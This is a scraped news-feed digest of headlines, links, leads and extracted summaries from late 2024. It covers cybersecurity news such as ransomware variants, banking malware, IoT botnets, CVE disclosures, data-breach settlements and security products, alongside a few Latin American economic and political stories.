    Threat actors continue to probe the payments ecosystem for vulnerabilities and were successful in conducting fraud schemes affecting multiple financial institutions, technologies, and processes, according to Visa. The resurgence of physical theft Scammers are going back to basics with an increase of physical theft over the past six months, capitalizing on the window between the theft and the victim’s awareness. After a theft, the most common ways the criminals are capitalizing on their theft by … More

    The post Fraudsters revive old tactics mixed with modern technology appeared first on Help Net Security.

    "

    Autosummary: The threat actor toolbox has evolved to include an expanding collection of cybercrime-as-a-service offerings, such as proxy networks, ransomware-as-a-service variants, and fraud tutorials, enabling them to scale their campaigns more effectively. Similarly, in March of 2023, Visa identified an emerging threat dubbed “digital pickpocketing,” where cybercriminals use a mobile point-of-sale device to tap against unsuspecting consumers’ wallets and initiate a payment, often in crowded areas. "


    World's most indebted oil firm is headache for new Mexico leader

    latam industry
    2024-10-28 https://www.bbc.com/news/articles/c2dpd8l4n69o
    Claudia Sheinbaum inherits a buoyant manufacturing sector, but also a troubled state-owned oil firm. "

    Autosummary: Washington’s disapproval of the measure, as publicly expressed by the US Ambassador to Mexico, Ken Salazar, suggested it could complicate, even jeopardise, parts of the USMCA renegotiation. Sheinbaum must strike a difficult balance, he adds, in getting Pemex to sell more of its products “which are obviously fossil fuels and oil-based, while at the same time addressing Mexico’s climate change responsibilities and dealing with urgent issues in our cities, like air pollution”. "


    Cubans endure days without power as energy crisis hits hard

    industry
    2024-10-26 https://www.bbc.com/news/articles/cx2nezzw8z9o
    People cook with firewood after days of blackouts and supply issues. "

    Autosummary: AFP Cuba's energy infrastructure needs more investment, economists say. Speaking last Sunday, at the height of what was Cuba’s most acute energy crisis in years, the country’s energy and mines minister, Vicente de la O Levy, blamed the problems for the country’s creaking electrical infrastructure on what he called the “brutal” US economic embargo on Cuba. “It’s especially hard on the children”, Marbeyis adds, her eyes tearing up, “because when they say I want this or that, we have nothing to give them.” “We’ve had no power for six days”, she says, brewing coffee on a makeshift charcoal stove inside her breeze-block, tin-roofed shack. In every step, a lot of investment is needed,” says Cuban economist, Ricardo Torres, at the American University in Washington DC. "


    Venezuela vents its anger at Brazil's Brics snub

    latam industry
    2024-10-25 https://www.bbc.com/news/articles/c624m4kgrg3o
    Venezuela criticises Brazil's decision to veto its admission to the Brics group of emerging economies. "

    Autosummary: Jair Bolsonaro has applied against Venezuela for years, reproducing the hatred, exclusion and intolerance promoted from the centres of power in the West," the Venezuelan foreign ministry said in a statement. "


    New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics

    exploits ransomware industry
    2024-10-24 https://thehackernews.com/2024/10/new-qilinb-ransomware-variant-emerges.html
    Cybersecurity researchers have discovered an advanced version of the Qilin ransomware sporting increased sophistication and tactics to evade detection. The new variant is being tracked by cybersecurity firm Halcyon under the moniker Qilin.B. "Notably, Qilin.B now supports AES-256-CTR encryption for systems with AESNI capabilities, while still retaining Chacha20 for systems that lack this support "

    Autosummary: "Out of the 99 healthcare organizations that admitted to paying the ransom and disclosed the ransom paid, the median payment was $1.5 million, and the average payment was $4.4 million," the tech giant said. "


    New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection

    financial exploits industry
    2024-10-23 https://thehackernews.com/2024/10/new-grandoreiro-banking-malware.html
    New variants of a banking malware called Grandoreiro have been found to adopt new tactics in an effort to bypass anti-fraud measures, indicating that the malicious software is continuing to be actively developed despite law enforcement efforts to crack down on the operation. "Only part of this gang was arrested: the remaining operators behind Grandoreiro continue attacking users all over the "

    Autosummary: "Grandoreiro searches for anti-malware solutions such as AVAST, Bitdefender, Nod32, Kaspersky, McAfee, Windows Defender, Sophos, Virus Free, Adaware, Symantec, Tencent, Avira, ActiveScan, and CrowdStrike," the company said. "


    Palo Alto Networks extends security into harsh industrial environments

    industry
    2024-10-22 https://www.helpnetsecurity.com/2024/10/22/palo-alto-networks-ot-security/

    The convergence of IT and operational technology (OT) and the digital transformation of OT have created new opportunities for innovation and efficiency in critical Industrial Automation and Control Systems. However, these advancements also broaden the potential attack surface, making it even more crucial to improve and extend security for OT environments. Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by … More

    The post Palo Alto Networks extends security into harsh industrial environments appeared first on Help Net Security.

    "

    Autosummary: Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by Precision AI, the Prisma Access Browser with Privileged Remote Access and a suite of ruggedized, ML-powered Next-Generation Firewalls (NGFWs) built to withstand harsh industrial settings where traditional firewalls often cannot operate. "


    Evolving cybercriminal tactics targeting SMBs

    industry ciber
    2024-10-21 https://www.helpnetsecurity.com/2024/10/21/bec-human-error-video/

    A recent Todyl report revealed a 558% increase in BEC (Business Email Compromise), AiTM (Adversary-in-the-Middle), and ATO (Account Takeover) attacks in 2024. In this Help Net Security video, David Langlands, Chief Security Officer at Todyl, discusses these evolving cyber threats. Here are the key findings from the report: BEC is evolving as attackers shift from traditional malware to exploiting human error and vulnerable communication channels. Attackers are exploiting gaps in security like the lack of … More

    The post Evolving cybercriminal tactics targeting SMBs appeared first on Help Net Security.

    "

    Autosummary: "


    This industry profits from knowing you have cancer, explains Cody Venzke (Lock and Code S05E22)

    industry
    2024-10-21 https://www.malwarebytes.com/blog/podcast/2024/10/this-industry-profits-from-knowing-you-have-cancer-explains-cody-venzke-lock-and-code-s05e22
    This week on the Lock and Code podcast, we speak with Cody Venzke about why data brokers are allowed to collect everything about us. "

    Autosummary: Today, on the Lock and Code podcast with host David Ruiz, we speak with Cody Venzke, senior policy counsel with the ACLU, about how data brokers collect their information, what data points are off-limits (if any), and how people can protect their sensitive information, along with the harms that come from unchecked data broker activity—beyond just targeted advertising. "


    How NIS2 will impact sectors from healthcare to energy

    industry
    2024-10-17 https://www.helpnetsecurity.com/2024/10/17/mick-baccio-splunk-nis2-challenges/

    In this Help Net Security interview, Mick Baccio, Global Security Advisor at Splunk SURGe, discusses the far-reaching implications of the NIS2 Directive beyond traditional IT security. He explains how NIS2 will fundamentally change cybersecurity governance, making it a core aspect of organizational strategy and accountability. Many experts suggest that the NIS2 Directive has far-reaching implications beyond IT security. Could you expand on the specific non-technical requirements that companies must be aware of? The NIS2 Directive … More

    The post How NIS2 will impact sectors from healthcare to energy appeared first on Help Net Security.

    "

    Autosummary: The NIS2 Directive significantly broadens its scope compared to NIS1, now encompassing critical sectors such as telecommunications, food production, waste management, energy, healthcare, and chemical manufacturing. Moreover, as not all services benefit from a one-stop shop jurisdiction regime, some entities will face up to 27 distinct registration, auditing, and enforcement regimes. "


    Marriott settles with FTC, to pay $52 million over data breaches

    financial industry
    2024-10-10 https://www.bleepingcomputer.com/news/legal/marriott-settles-with-ftc-to-pay-52-million-over-data-breaches/
    Marriott International and its subsidiary Starwood Hotels will pay $52 million and create a comprehensive information security program as part of settlements for data breaches that impacted over 344 million customers. [...] "

    Autosummary: The exposed data included names, email addresses, postal addresses, phone numbers, dates of birth, and loyalty account information. "


    Researchers Uncover Major Security Vulnerabilities in Industrial MMS Protocol Libraries

    industry
    2024-10-09 https://thehackernews.com/2024/10/researchers-uncover-major-security.html
    Details have emerged about multiple security vulnerabilities in two implementations of the Manufacturing Message Specification (MMS) protocol that, if successfully exploited, could have severe impacts in industrial environments. "The vulnerabilities could allow an attacker to crash an industrial device or in some cases, enable remote code execution," Claroty researchers Mashav Sapir and Vera "

    Autosummary: A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2971 (CVSS score: 8.6) - A type confusion vulnerability in libIEC61850 that could allow an attacker to crash the server with a malicious payload CVE-2022-2972 (CVSS score: 10.0) - A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2973 (CVSS score: 8.6) - "


    BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities

    industry
    2024-10-08 https://www.helpnetsecurity.com/2024/10/08/breachlock-attack-surface-analytics/

    BreachLock strengthens continuous threat exposure management (CTEM) capabilities for enterprise customers with its new Attack Surface Analytics feature. Time is of the essence when Fortune 500 security teams find themselves waking up to a Code Red vulnerability being actively exploited. When CISOs urgently request a detailed list of impacted assets, including those running a specific TLS version, which ports are being used, servers involved, and more, along with a patching strategy, that’s where BreachLock’s new … More

    The post BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities appeared first on Help Net Security.

    "

    Autosummary: The feature provides enterprise users with: All relevant asset intelligence consolidated into a single, consolidated, cumulative view, with details on the correlation between domains, subdomains, IP addresses and ports, and associated technologies. "


    Thousands of Adobe Commerce e-stores hacked by exploiting the CosmicSting bug

    exploits industry
    2024-10-03 https://securityaffairs.com/169316/cyber-crime/4000-unpatched-adobe-commerce-and-magento-stores-hacked.html
    Over 4,000 unpatched Adobe Commerce and Magento stores have been compromised by exploiting critical vulnerability CVE-2024-34102. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. The flaw is an Improper Restriction […] "

    Autosummary: Threat groups exploiting this vulnerability include Bobry, Polyovki (infecting over 650 stores), Surki, Burunduki, Ondatry, Khomyaki, and Belki. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. "


    Over 4,000 Adobe Commerce, Magento shops hacked in CosmicSting attacks

    industry
    2024-10-03 https://www.bleepingcomputer.com/news/security/over-4-000-adobe-commerce-magento-shops-hacked-in-cosmicsting-attacks/
    Approximately 5% of all Adobe Commerce and Magento online stores, or 4,275 in absolute numbers, have been hacked in "CosmicSting" attacks. [...] "

    Autosummary: Website administrators are strongly advised to move to the following versions (or later) as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec has provided a tool to check if their site is vulnerable and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here. "


    Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

    exploits industry
    2024-10-02 https://thehackernews.com/2024/10/alert-adobe-commerce-and-magento-stores.html
    Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting. Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming, "

    Autosummary: "


    Veeam Recon Scanner identifies adversary tactics, techniques, and procedures

    industry
    2024-10-01 https://www.helpnetsecurity.com/2024/10/01/veeam-recon-scanner/

    Veeam Software announced the addition of new Veeam Recon Scanner technology to Veeam Data Platform. This technology, developed by Coveware by Veeam, draws on years of experience in cyber-extortion incident response and the largest database of cyber incidents in the world. Veeam Recon Scanner is designed to proactively identify, triage, and prevent cyberattacks, revolutionizing threat assessment in the data protection market. “Protecting your organization from a cyber-attack requires a coordinated strategy. It starts at the … More

    The post Veeam Recon Scanner identifies adversary tactics, techniques, and procedures appeared first on Help Net Security.

    "

    Autosummary: “By collecting and analyzing data proactively, Recon Scanner identifies unexpected network connections, unusual user behavior, suspicious file activity, data exfiltration attempts, and even potential brute force attacks. "


    They were arrested for posting during the riots – will it change anything?

    industry
    2024-09-27 https://www.bbc.com/news/articles/cr548zdmz3jo
    Charges following disorder felt significant, but for social media giants there was no day of reckoning. "

    Autosummary: And nor, it seems, for the social media giants whose algorithms, time and time again, are accused of prioritising engagement over safety, pushing content regardless of the reaction it can provoke. Kay, 26, and Parlour, 28, have been sentenced to 38 months and 20 months in prison respectively for stirring up racial hatred online during the summer riots. But while accountability has been felt at “the very sharp end” by those who participated in the disorder and posted hateful content online, Mr Jukes said “the people who make billions from providing those opportunities” to post harmful content on social media “have not really paid any price at all”. The UK’s head of counter-terror policing, Assistant Commissioner Matt Jukes, told me for the BBC’s Newscast that “X was an enormous driver” of posts that contributed to the summer’s disorder. "


    3 tips for securing IoT devices in a connected world

    industry
    2024-09-27 https://www.helpnetsecurity.com/2024/09/27/iot-devices-security/

    IoT devices have become integral to how many organizations operate. From Smart TVs in conference rooms to connected sensors and wireless security cameras, these connected devices are now a fixture in the modern workplace. They also, however, present a real and often overlooked cybersecurity threat. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, … More

    The post 3 tips for securing IoT devices in a connected world appeared first on Help Net Security.

    "

    Autosummary: When segmenting your network, organizations should: isolate IoT devices; use VLANs and firewalls with security controls between network segments; and employ zero-trust architecture. Access control is the process of defining and enforcing policies that dictate who or what can access specific resources within a network. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, alongside ensuring secure deployment practices. "


    Threat landscape for industrial automation systems. Q2 2024

    industry
    2024-09-26 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q2-2024/
    In the second quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.9 pp from the previous quarter to 23.5%. Compared to the second quarter of 2023, the percentage decreased by 3.3 pp. "

    Autosummary: Q2 in numbers

    Parameter                                                       Q1 2024   Q2 2024   Quarterly change
    Global percentage of attacked ICS computers                     24.40%    23.50%    -0.9 pp
    Percentage of ICS computers on which malicious objects from different categories were blocked:
      Denylisted internet resources                                 6.84%     6.63%     -0.21 pp
      Malicious scripts and phishing pages (JS and HTML)            5.84%     5.69%     -0.15 pp
      Spy Trojans, backdoors and keyloggers                         3.90%     4.08%     0.18 pp
      Malicious documents (MSOffice + PDF)                          1.72%     1.96%     0.24 pp
      Viruses                                                       1.56%     1.54%     -0.02 pp
      Worms                                                         1.51%     1.48%     -0.03 pp
      Miners in the form of executable files for Windows            0.92%     0.89%     -0.03 pp
      Web miners running in browsers                                0.49%     0.50%     0.01 pp

    This group includes Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries.

    Malicious object categories. Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: malicious objects used for initial infection; next-stage malware; self-propagating malware. Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents.

    [Figure: Percentage of ICS computers on which malicious objects were blocked, by month, 2022-2024]

    Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 11.3% in Northern Europe to 30% in Africa.

    [Figure: Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024]

    The percentage of ICS computers on which malicious objects were blocked in the second quarter of 2024 was highest in May and lowest in June. "


    CISA warns hackers targeting industrial systems with “unsophisticated methods” as claims made of Lebanon water hack

    industry
    2024-09-26 https://www.tripwire.com/state-of-security/cisa-warns-hackers-targeting-industrial-systems-unsophisticated-methods
    The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that hackers continue to be capable of compromising industrial control systems (ICS) and other operational technology (OT) using "unsophisticated methods" - suggesting that much more still needs to be done to secure them properly. Meanwhile, a pro-Israel hacking group claims to have changed chlorine levels at water facilities in Lebanon. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: Industrial control systems manage and regulate processes in the WWS sector such as water filtration, chemical treatment, and pumping stations - ensuring that they operate within safe parameters, maintain the quality of drinking water, and prevent contamination to the environment. "


    Critical RCE vulnerability found in OpenPLC

    exploits industry
    2024-09-26 https://securityaffairs.com/168953/ics-scada/openplc-critical-flaw.html
    Cisco’s Talos reported critical and high-severity flaws in OpenPLC that could lead to a DoS condition and remote code execution. Cisco’s Talos threat intelligence unit has disclosed details of five newly patched vulnerabilities in OpenPLC, an open-source programmable logic controller. These vulnerabilities can be exploited to trigger a denial-of-service (DoS) condition or execute remote code. OpenPLC […] "

    Autosummary: The remaining DoS flaws discovered by Talos are tracked as CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, and CVE-2024-39590. "


    ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations

    industry
    2024-09-25 https://www.helpnetsecurity.com/2024/09/25/manageengine-analytics-plus-6-0/

    ManageEngine announced a significant upgrade to its flagship IT analytics solution, Analytics Plus. Version 6.0 introduces Spotlight, a contextual recommendations engine powered by AI, designed to identify key inefficiencies in IT operations and suggest corrective strategies. The 2023 State of Analytics Engineering report found that time to business insight is the biggest challenge for nearly 50% of surveyed directors. Spotlight dramatically reduces the time IT managers and CIOs spend analyzing various IT metrics and coming … More

    The post ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations appeared first on Help Net Security.

    "

    Autosummary: “Deriving meaningful and context-specific insights is becoming increasingly challenging due to a significant disconnect: the people performing the analysis are skilled at mining data but often lack the IT context, making it difficult to translate findings into actionable business decisions,” said Samantha Hall, service delivery manager, Leathams Ltd., a UK-based food supplying company. In addition to these key features, Analytics Plus version 6.0 includes a range of productive enhancements such as multivariate forecasting, workflow charts, support for distributed processing (on-premises) and more than 10 new integrations with popular IT tools. "


    CISA: Hackers target industrial systems using “unsophisticated methods”

    industry
    2024-09-25 https://www.bleepingcomputer.com/news/security/cisa-hackers-target-industrial-systems-using-unsophisticated-methods/
    CISA warned today of threat actors trying to breach critical infrastructure networks by targeting Internet-exposed industrial devices using "unsophisticated" methods like brute force attacks and default credentials. [...] "

    Autosummary: "


    MFA bypass becomes a critical security issue as ransomware tactics advance

    exploits ransomware industry
    2024-09-24 https://www.helpnetsecurity.com/2024/09/24/ransomware-session-hijacking-tactics/

    Ransomware is seen as the biggest cybersecurity threat across every industry, with 75% of organizations affected by ransomware more than once in the past 12 months – a jump from 61% in 2023, according to SpyCloud. Session hijacking surges as major ransomware threat. Traditional tools and solutions like antivirus and MFA are not infallible. For organizations affected by ransomware in the past year, MFA bypass via session hijacking is seen as the greatest emerging threat … More

    The post MFA bypass becomes a critical security issue as ransomware tactics advance appeared first on Help Net Security.

    "

    Autosummary: Insurance: 6.3x more likely to experience a ransomware attack. Healthcare: 2.1x more likely to experience a ransomware attack. CIOs, CISOs, and other IT security executives (91%) are almost twice as confident as their security practitioner counterparts (54%) in their organization’s ability to prevent a full-blown ransomware attack – outlining an alarming disconnect between key decision makers and front-line teams on their preparedness for this costly threat. Rise of infostealer malware and digital identity exposure. Cybercriminals have pivoted to next-generation tactics, using information-stealing malware (or “infostealers”) to siphon digital identity data, authentication details, and session cookies from infected users and selling this information to ransomware operators – leaving virtually every respondent (99.8%) concerned about this trend. "


    Discover Latest Ransomware Tactics and Zero Trust Strategies in This Expert Webinar

    exploits ransomware industry
    2024-09-24 https://thehackernews.com/2024/09/discover-latest-ransomware-tactics-and.html
    Ransomware is no longer just a threat; it's an entire industry. Cybercriminals are growing more sophisticated, and their tactics are evolving rapidly. This persistent danger is a major concern for business leaders. But there's good news: you don't have to be defenseless. What if you could gain a strategic edge? Join our exclusive webinar, "Unpacking the 2024 Ransomware Landscape: Insights and "

    Autosummary: In this informative session, you will: Go Beyond the Headlines: Explore the details behind recent ransomware incidents and uncover how attackers infiltrate, encrypt, and extort their victims. "


    Transportation, logistics companies targeted with lures impersonating fleet management software

    industry
    2024-09-24 https://www.helpnetsecurity.com/2024/09/24/transportation-logistics-malware-attacks/

    Financially motivated threat actors are targeting North American companies in the transportation and logistics sector with tailored lures, info-stealing malware, and a clever new trick. How the attack unfolds. According to Proofpoint threat researchers, the attackers start by compromising email accounts of workers in transportation and shipping companies and then responding to existing email conversations within the account’s inbox. The emails are usually short, and initially urged recipients to follow a link to / download … More

    The post Transportation, logistics companies targeted with lures impersonating fleet management software appeared first on Help Net Security.

    "

    Autosummary: In these limited campaigns, the delivered malware included info-stealers (Lumma Stealer, StealC, ArechClient2, DanaBot) and remote control software (NetSupport). "


    Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk

    industry
    2024-09-23 https://thehackernews.com/2024/09/critical-flaw-in-microchip-asf-exposes.html
    A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution. The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF's implementation of the tinydhcp server stemming from a lack of "

    Autosummary: "


    Essential metrics for effective security program assessment

    industry
    2024-09-19 https://www.helpnetsecurity.com/2024/09/19/alex-spivakovsky-pentera-security-programs/

    In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. Spivakovsky explains how automation and proactive testing can reveal vulnerabilities and improve overall security posture. What are the most effective metrics for measuring the success of a security program? The most straightforward metric is: Has your organization been breached? If the answer is yes, it’s clear there’s work to be … More

    The post Essential metrics for effective security program assessment appeared first on Help Net Security.

    "

    Autosummary: The formula typically used is: ROSI = (Losses avoided – Cost of security measures) / Cost of security measures. For example, if a security program prevents $1 million in potential breach losses and costs $250,000 to implement, the ROSI would be 3, meaning a return of $3 for every $1 spent on security. Internal security teams tend to be small, relative to the overall organization, and cannot be everywhere; all employees need to understand how their actions can impact the overall organizational security posture and practice proper security hygiene. In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. This helps executive management and board members, who are typically more business-focused, and less familiar with cybersecurity concepts, to better understand the impact of security initiatives. "


    Forescout for OT Security secures OT, IoT, and IT hybrid environments

    industry
    2024-09-19 https://www.helpnetsecurity.com/2024/09/19/forescout-for-ot-security/

    Forescout announced its new SaaS Operational Technologies (OT) solution. Forescout for OT Security is a security solution that allows organizations to secure complex, heterogeneous OT, IoT/IoMT, and IT environments whether they are fully in cloud, completely air-gapped, or hybrid. Forescout for OT Security combines: proactive security and exposure management; threat detection powered by Forescout Research – Vedere Labs’ proprietary threat research of unmanaged devices; critical operational monitoring; and control across cloud and on-premises networks. “The attack … More

    The post Forescout for OT Security secures OT, IoT, and IT hybrid environments appeared first on Help Net Security.

    "

    Autosummary: "


    North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

    exploits industry
    2024-09-18 https://thehackernews.com/2024/09/north-korean-hackers-target-energy-and.html
    A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is "

    Autosummary: The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia. "


    New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide

    industry
    2024-09-18 https://thehackernews.com/2024/09/new-raptor-train-iot-botnet-compromises.html
    Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett). The sophisticated botnet, dubbed Raptor Train by Lumen's Black Lotus Labs, is believed to have been operational since at least May 2020, "

    Autosummary: Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel. "


    Experts warn of China-linked APT’s Raptor Train IoT Botnet

    industry
    2024-09-18 https://securityaffairs.com/168563/malware/raptor-train-botnet-iot.html
    Researchers warn of a new IoT botnet called Raptor Train that already compromised over 200,000 devices worldwide. Cybersecurity researchers from Lumen’s Black Lotus Labs discovered a new botnet, named Raptor Train, composed of small office/home office (SOHO) and IoT devices. The experts believe the botnet is controlled by a China-linked APT group Flax Typhoon (also […] "

    Autosummary: Below are some of the devices included in the botnet. Modems/routers: ActionTec PK5000, ASUS RT-*/GT-*/ZenWifi, TP-LINK, DrayTek Vigor, Tenda Wireless, Ruijie, Zyxel USG*, Ruckus Wireless, VNPT iGate, Mikrotik, TOTOLINK. IP cameras: D-LINK DCS-*, Hikvision, Mobotix, NUUO, AXIS, Panasonic. NVR/DVR: Shenzhen TVT NVRs/DVRs. NAS: QNAP (TS Series), Fujitsu, Synology. The attribution of the Raptor Train botnet to the Chinese nation-state actor is based on multiple factors, including the operational timelines, targeting of sectors aligned with Chinese interests, use of the Chinese language, and other tactics, techniques, and procedures (TTPs) that overlap with known Chinese cyber activities. "


    23andMe to pay $30 million in genetics data breach settlement

    financial industry
    2024-09-13 https://www.bleepingcomputer.com/news/security/23andme-to-pay-30-million-in-genetics-data-breach-settlement/
    DNA testing giant 23andMe has agreed to pay $30 million to settle a lawsuit over a data breach that exposed the personal information of 6.4 million customers in 2023. [...] "

    Autosummary: "23andMe denies the claims and allegations set forth in the Complaint, denies that it failed to properly protect the Personal Information of its consumers and users, and further denies the viability of Settlement Class Representatives’ claims for statutory damages," the company said in the filed preliminary settlement. "


    NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics

    industry
    2024-09-12 https://www.helpnetsecurity.com/2024/09/12/netscout-cyber-intelligence-platform/

    NETSCOUT announced updates to its advanced, scalable deep packet inspection-based Omnis Cyber Intelligence Network Detection and Response (NDR) platform. New MITRE ATT&CK behavioral analytics enable earlier detection of advanced threats like ransomware, suspicious traffic, or unauthorized access attempts while improving remediation to help meet industry and country compliance requirements. “Digital resilience allows enterprises to continuously operate and quickly leverage digital opportunities to serve their customers, especially during economically challenging times,” stated Fernando Montenegro, senior principal … More

    The post NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics appeared first on Help Net Security.

    "

    Autosummary: “NETSCOUT helps its customers strengthen their digital resilience by enabling easier detection, faster response, and more effective recovery from cyber threats,” stated Jerry Mancini, senior director, office of the CTO, NETSCOUT. "


    Saviynt Intelligence delivers identity security analytics through ML and AI capabilities

    industry
    2024-09-11 https://www.helpnetsecurity.com/2024/09/11/saviynt-intelligence-suite/

    Saviynt announced the release of its Intelligence Suite with general availability of Intelligent Recommendations, which will provide customers with dynamic roles, access recommendations, actionable insights, and a multi-dimensional weighted trust scoring model that will be a true game changer. “Saviynt Intelligence will transform identity security from a set of purely operational processes into ones that are automated with artificial intelligence (AI) and machine learning (ML). Our experience is that this actionable intelligence will reduce access … More

    The post Saviynt Intelligence delivers identity security analytics through ML and AI capabilities appeared first on Help Net Security.

    "

    Autosummary: This is Saviynt’s third-generation peer analytics engine, capable of analyzing distinct peer clusters for various identity types, including workforce, contractors, externals, machines, and privileged accounts. "


    Quad7 botnet evolves to more stealthy tactics to evade detection

    industry
    2024-09-10 https://securityaffairs.com/168250/malware/quad7-botnet-evolves.html
    The Quad7 botnet evolves and targets new SOHO devices, including Axentra media servers, Ruckus wireless routers and Zyxel VPN appliances. The Sekoia TDR team identified additional implants associated with the Quad7 botnet operation. The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and […] "

    Autosummary: The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities. "


    TIDRONE APT targets drone manufacturers in Taiwan

    industry
    2024-09-09 https://securityaffairs.com/168210/apt/tidrone-targets-organizations-taiwan.html
    A previously undocumented threat actor tracked as TIDRONE targets organizations in the military and satellite industries in Taiwan. Trend Micro spotted an allegedly China-linked threat actor, tracked as TIDRONE, targeting drone manufacturers in Taiwan. The group, which was previously undocumented, uses enterprise resource planning (ERP) software and remote desktops to deploy advanced malware, including CXCLNT and CLNTEND. CXCLNT […] "

    Autosummary: Since April, the group used CLNTEND, a previously undetected remote access tool (RAT), which supports a wider range of network protocols for communication, further enhancing their capabilities. "


    The future of automotive cybersecurity: Treating vehicles as endpoints

    industry ciber
    2024-09-05 https://www.helpnetsecurity.com/2024/09/05/automotive-cybersecurity-future/

    The automotive industry is facing many of the same cybersecurity risks and threats that successful organizations in other sectors are up against, but it’s also battling some distinct ones. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the … More

    The post The future of automotive cybersecurity: Treating vehicles as endpoints appeared first on Help Net Security.

    "

    Autosummary: Advanced persistent threat groups, such as APT4, APT6 and APT37, are notorious for their focus on intellectual property theft, especially in industries where proprietary technology and competitive advantage are critical. Given the proprietary nature and immense competitive value of automotive technology, these firms must be particularly vigilant against espionage attempts, as the consequences of a successful attack could be devastating both financially and reputationally, potentially leading to lost market share and long-term erosion of trust. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the future of automotive cybersecurity. Every technology, no matter how advanced, comes with its own set of weaknesses, and automotive technology is no exception. "


    How ransomware tactics are shifting, and what it means for your business

    exploits ransomware industry
    2024-09-03 https://www.helpnetsecurity.com/2024/09/03/tim-west-withsecure-ransomware-tactics-shifting/

